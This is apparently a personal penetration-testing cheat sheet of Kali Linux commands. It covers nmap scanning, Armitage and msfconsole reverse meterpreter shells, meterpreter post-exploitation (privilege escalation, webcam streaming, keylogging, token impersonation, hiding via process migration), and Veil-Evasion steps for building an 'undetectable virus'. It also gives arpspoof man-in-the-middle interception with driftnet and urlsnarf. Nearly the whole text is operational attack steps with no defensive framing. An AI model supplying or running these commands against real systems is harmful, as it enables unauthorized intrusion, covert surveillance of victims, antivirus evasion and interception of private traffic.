A while back I was tasked with some penetration testing. I plan to put a collection of what I did here.
I use Kali Linux for my testing.
nmap
Here is an example of a command to scan for any open ports on network 192.168.1.0
nmap -v -p 1-65535 -sV -O -sS -T4 -oX (path-to-xml.xml) 192.168.1.0/16
More nmap examples can be found here
Armitage
open up the listener like so:
- Armitage>Listeners>Reverse (wait for)
- enter the port you used in your exploit (virus)
- type is meterpreter
- The listener is now running
Once machine is compromised it will display lightning bolts on the machine. Here are helpful things to do in Armitage:
- Right click compromised machine select Meterpreter X>Access>Pass Session – this will create another session do this in case the one you are in crashes so you have a backup
- Select Meterpreter X>Pivoting>Setup – click the network you want and select add pivot – This will setup a pivot point to attack machines accessible by the compromised machine
Meterpreter Shell
getsystem – attempts to elevate your privilege to that of local system
webcam_stream – Play a video stream from webcam
webcam_list – list webcams
keyscan_start – log keystrokes (be sure to open another Meterpreter session before doing this as it may crash the current one)
keyscan_stop – stops logging keystrokes
use incognito – loads modules for token impersination ect.
list_tokens – list token available (use incognito must be loaded)
impersonate_token archq\\administartor – impersinate specifed token (use incognito must be loaded)
getuid – shows current user session is running as
getsid – get the sid of the user process is running as
ps – list processess
migrate PID – Migrate to certain process. this helps hide your program
shell – drops you into cmd.exe for windows on that machine
Msfconsole Commands
msfupdate updates the framework
To setup a reverse shell:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP Address
set LPORT 4444
exploit
Veil-evasion
Use this to create your own undetectable virus (Unknown how well it hides now it has been several years since I tested)
You will want to setup a meterpreter listener that this virus will connect to
list
use 35 (or python/shellcode_inject/aes_encrypt
configure the information then type:
generate
use the file outputted on machine you want to compromise
Man in the Middle Attack
Enable IP Forward like so:
echo 1 >> /proc/sys/net/ipv4/ip_forward
Now to setup the ARP spoof:
arpspoof -i eth0 -t [IP Address of Victim] [Router IP Address]
Then do the opposite way:
arpspoof -i eth0 -t [Router IP Address] [IP Address of Victim]
You can then do wireshark to capture their traffic or run the following command to see the pages they visit:
driftnet -i eth0
Once that is working you can then sniff traffic to and from that machine using:
driftnet -i eth0
wireshark
urlsnarf -i eth0
Enable Auto Login as Root
leafpad /etc/gdm3/daemon.conf uncomment the lines:
[daemon] # Enabling automatic login AutomaticLoginEnable = true AutomaticLogin = root